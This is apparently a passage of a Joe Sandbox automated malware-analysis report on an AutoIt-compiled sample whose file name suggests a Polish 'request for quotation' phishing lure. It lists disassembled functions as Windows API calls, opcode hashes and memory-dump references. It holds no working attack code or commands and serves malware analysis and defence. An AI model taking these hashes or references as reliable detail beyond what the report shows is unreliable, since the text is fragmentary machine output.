                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 357397906-0
                                                                                                                                                                                                                                                      • Opcode ID: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                                                                                                                                                                                                      • Instruction ID: 02545dd0d615a745195cb6f618e51c1f9c2552a202a2369b8695847d2ce6fb2f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 24117EB9608302AFC304DF18D98095BBBE9FFD8650F10891EF88993350D770E9498BA2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: DeleteDestroyObject$IconWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3349847261-0
                                                                                                                                                                                                                                                      • Opcode ID: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                                                                                                                                                                                                      • Instruction ID: 3a9029eb8e47786e7dec82746d504bb216afab776d143f23dce7b1a7602128e4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 06F03C702006419BDB20AF65DDD8A2B77ACEF45322740456AFD04D7242DB28DC498B7D
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 0044B60B
                                                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,?), ref: 0044B619
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B630
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B641
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2223660684-0
                                                                                                                                                                                                                                                      • Opcode ID: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                                                                                                                                                                                                      • Instruction ID: 8f2921e390180aa9c6083979f061463a0462abb68b72a76a452ff5fd2bc04521
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35F08C362422019F82249B59EA488DBB3FDEBE97213009C2FE142C32108BB5F806CB75
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                                                                                                                                                        • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                                                                                                                                                        • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                                                                                                                                                        • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                                                                                                                                                        • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                                                                                                                                      • MoveToEx.GDI32(?,?,00000000,00000000), ref: 0044728F
                                                                                                                                                                                                                                                      • LineTo.GDI32(?,00000000,00000002), ref: 004472A0
                                                                                                                                                                                                                                                      • EndPath.GDI32(?), ref: 004472B0
                                                                                                                                                                                                                                                      • StrokePath.GDI32(?), ref: 004472BE
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2783949968-0
                                                                                                                                                                                                                                                      • Opcode ID: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                                                                                                                                                                                                      • Instruction ID: 15f667079dd022c0076d5117e5ffb33549464faf874781034dcdd6a9c0a79bb3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 46F09030109361BFE211DB10DC0AF9F3B98AB46310F10490CF641622D2C7B46845C7BA
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00471144
                                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 0047114D
                                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000074), ref: 0047115A
                                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 0047117B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2889604237-0
                                                                                                                                                                                                                                                      • Opcode ID: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                                                                                                                                                                                                      • Instruction ID: a1da8b046b56c0024f4e51319ca7c868ce9b42ab557c4db2e47d6af70bf9fcef
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75F05E759042009FC310DF65DC4856EBBA4FB94351F108C3EFD05D2251DB7889059B99
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00471102
                                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 0047110B
                                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00471118
                                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 00471139
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2889604237-0
                                                                                                                                                                                                                                                      • Opcode ID: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                                                                                                                                                                                                      • Instruction ID: 5204c471e266b2ed5cdb435334cd6f206910ee07043e0bb223494c3f632f6575
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78F05E759042009FD310EF65DC5896EBBA4FB94351F104C3EFC05D2251DB7489059B99
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004390CD
                                                                                                                                                                                                                                                      • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 004390DB
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390EB
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390F0
                                                                                                                                                                                                                                                        • Part of subcall function 00438FB6: GetProcessHeap.KERNEL32(00000000,?,00439504,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FC1
                                                                                                                                                                                                                                                        • Part of subcall function 00438FB6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00438FC8
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 146765662-0
                                                                                                                                                                                                                                                      • Opcode ID: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                                                                                                                                                                                                      • Instruction ID: e19b07cb6d87eea3d85dfea562759309df1919ba68b29a0146d7a5ec0ea3c710
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5DE0C976504311ABC620EB65DC48C4BB7E9EF883303114E1DF89693260CA74E881CB65
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00414070
                                                                                                                                                                                                                                                        • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                                                                                                                                                                                                      • __getptd_noexit.LIBCMT ref: 00414080
                                                                                                                                                                                                                                                      • __freeptd.LIBCMT ref: 0041408A
                                                                                                                                                                                                                                                      • ExitThread.KERNEL32 ref: 00414093
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3182216644-0
                                                                                                                                                                                                                                                      • Opcode ID: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                                                                                                                                                                                                                      • Instruction ID: 8c1b811a677bc0208766d104aadce1409d27245c16b3af4a320e27a455eae914
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8D0EC7051024256D6207BA7ED097AA3A589B44B26B15446EA905801B1DF68D9C1862D
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • OleSetContainedObject.OLE32(00000000,00000001), ref: 0047857A
                                                                                                                                                                                                                                                        • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                        • Part of subcall function 00445513: OleSetContainedObject.OLE32(?,00000000), ref: 00445593
                                                                                                                                                                                                                                                        • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                                                                                                                                                        • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                                                                                                                                                        • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                                                                                                                                                        • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CopyVariant$ContainedObject$ErrorLast_malloc
                                                                                                                                                                                                                                                      • String ID: AutoIt3GUI$Container
                                                                                                                                                                                                                                                      • API String ID: 3380330463-3941886329
                                                                                                                                                                                                                                                      • Opcode ID: 167728f1ef0b290fa0ab537cd1f49c444f99f24bf3b7fe0b60cc3227d219d98d
                                                                                                                                                                                                                                                      • Instruction ID: 8a51a4197b359b89da059ec4b883cd23719ad159cb4f439b8c2c8f5fea4c1b32
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 167728f1ef0b290fa0ab537cd1f49c444f99f24bf3b7fe0b60cc3227d219d98d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FEA16A71240601AFC760EF69C880A6BB7E9FB88304F10892EF649CB361EB75E945CB55
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: HH$HH
                                                                                                                                                                                                                                                      • API String ID: 0-1787419579
                                                                                                                                                                                                                                                      • Opcode ID: d6191838e98fd11d03648c209846f73e934a5a3a8cd563e055064b994aed395a
                                                                                                                                                                                                                                                      • Instruction ID: b2aab3850ea6996be17d3b26b1a0d96f4757dd5de2ef7d298d9c2790e2b3b10f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6191838e98fd11d03648c209846f73e934a5a3a8cd563e055064b994aed395a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1241BF367042009FC310EF69E881F5AF3A1EF99314F548A6EFA589B381D776E811CB95
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InfoItemMenu_memset
                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                      • API String ID: 2223754486-4108050209
                                                                                                                                                                                                                                                      • Opcode ID: 329a54ff67d94ba9cc6084adae87fda2d20c3be6e80653badd0ba820d0e67e64
                                                                                                                                                                                                                                                      • Instruction ID: 143d79469fb3e570aa9bb1e7a79db7ad77638f8ab3c2e89d41e08a42c99b444e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 329a54ff67d94ba9cc6084adae87fda2d20c3be6e80653badd0ba820d0e67e64
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB3101721043009BF3249F18DC85BABBBE4EBC6310F14081FFA90C62A0E379D949C75A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 0044846C
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044847E
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                                      • String ID: '
                                                                                                                                                                                                                                                      • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                      • Opcode ID: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                                                                                                                                                                                                      • Instruction ID: cecdca06d5aa7ecc7109d5e1ff25192cbd540bafe2d1ef24ff7c1b98f096cb5f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 984179706083459FE710CF18C880BABB7E1FB89700F54882EF9888B351DB75A841CF5A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                      • API String ID: 0-4108050209
                                                                                                                                                                                                                                                      • Opcode ID: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                                                                                                                                                                                                      • Instruction ID: 268d240ecd79f719a1425e83c09d650ed443e1bf0ac8ef4f8d51517adc50c1d2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6210D765042206BEB15DF08D844B97B7A4FBDA310F44492BEE9897250D379E848C7AA
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00451305
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00451313
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
